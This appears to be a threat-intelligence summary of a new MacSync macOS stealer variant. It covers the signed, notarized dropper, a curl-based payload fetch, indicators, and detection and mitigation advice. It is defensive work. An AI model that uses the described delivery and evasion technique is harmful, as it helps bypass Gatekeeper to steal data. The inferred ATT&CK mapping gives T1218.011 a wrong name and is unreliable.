Full Report
Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that's delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple's Gatekeeper checks. "Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more
Analysis Summary
# Tool/Technique: MacSync (New Variant)
## Overview
MacSync is a variant of a macOS information stealer. The latest delivery mechanism uses a digitally signed and notarized Swift application, masquerading as a messaging app installer, to bypass Apple's Gatekeeper security checks. This new variant moves away from older, more obvious distribution methods like "drag-to-terminal" or "ClickFix" techniques.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: macOS
- Capabilities: Data theft, remote command and control (C2), evasion of security controls.
- First Seen: The article references a previous analysis of MacSync in April 2025; the specific new variant is detailed in late December 2025.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on the described behavior (e.g., bypassing defenses, information gathering)*
- **TA0001 - Initial Access**
- T1566 - Phishing (Implied delivery via deceptive installer)
- T1566.002 - Spearphishing Link (Implied if the DMG link is shared via targeted communication)
- **TA0005 - Defense Evasion**
- T1218 - Signed Binary Proxy Execution
- T1218.011 - Signed and Notarized Application (Use of legitimate signed application to execute malicious payload)
- **TA0009 - Collection**
- T1119 - Automated Collection (Implied by 'information stealer' functionality)
## Functionality
### Core Capabilities
- **Delivery/Execution:** Delivered within a Disk Image (DMG) file disguised as a messaging app installer ("zk-call-messenger-installer-3.9.2-lts.dmg").
- **Evasion:** Uses a Swift application that is both **digitally signed and notarized** by Apple, allowing it to bypass initial checks by Gatekeeper and XProtect.
- **User Interaction Trick:** Prompts users to right-click and "open" the app, a common social engineering prompt used to manually bypass safeguards on notarized applications.
- **Payload Retrieval:** Uses a `curl` command (with flags `-fL -sS --noproxy`) to download an encoded script/payload from a remote source.
- **Execution Chain:** The signed Swift dropper performs checks (internet connectivity, execution interval enforcement) before downloading and executing an encoded script via a helper component.
### Advanced Features
- **Rate Limiting:** Enforces a minimum execution interval of approximately 3600 seconds (1 hour) between executions, likely to evade automated analysis or detect sandbox execution.
- **Payload Obfuscation:** The final payload is Base64-encoded.
- **Persistence/Capability:** It is a rebranded version of Mac.c, utilizing a Go-based agent that provides fully-featured remote command and control capabilities beyond simple data theft.
- **Evasion Tactic:** Uses an unusually large DMG file (25.5 MB), padding the size by embedding unrelated PDF documents to potentially confuse basic file analysis tools.
## Indicators of Compromise
- File Hashes: [Not provided in the article]
- File Names: "zk-call-messenger-installer-3.9.2-lts.dmg"
- Registry Keys: [Not applicable/mentioned for macOS initial execution]
- Network Indicators: `zkcall[.]net/download` (Defanged)
- Behavioral Indicators: Application prompts users to right-click and open; post-execution, execution of downloaded, encoded script; dynamic `curl` flags (`-fL -sS --noproxy`).
## Associated Threat Actors
- [Not explicitly named, but the tool itself (MacSync) is being tracked by researchers (Jamf).]
## Detection Methods
- **Signature-based detection:** Should target the known DMG file name and the specific `curl` command variations. Apple has since revoked the code signing certificate used.
- **Behavioral detection:** Monitoring for Swift executables that initiate network connections using unusual `curl` flag combinations or that modify quarantine attributes before execution.
- **YARA rules if available:** [Not provided in the article]
## Mitigation Strategies
- **Certificate Revocation:** Apple takes action by revoking the code signing certificate (as they did in this case).
- **User Education:** Training users to be wary of installing applications that require explicit right-click-and-open prompts, even if they appear signed.
- **Application Hardening:** Implementing strict application control policies that monitor or restrict the execution of processes originating from downloaded disk images.
- **Network Monitoring:** Blocking or flagging connections to known malicious domains, such as `zkcall[.]net`.
## Related Tools/Techniques
- **MacSync (Previous variants):** Relied on drag-to-terminal or ClickFix techniques.
- **Mac.c:** The predecessor/base for MacSync.
- **Odyssey:** Another macOS infostealer recently observed using signed/notarized DMG files mimicking established apps (like Google Meet).
- **DigitStealer:** Another macOS infostealer mentioned that still relies on unsigned DMGs.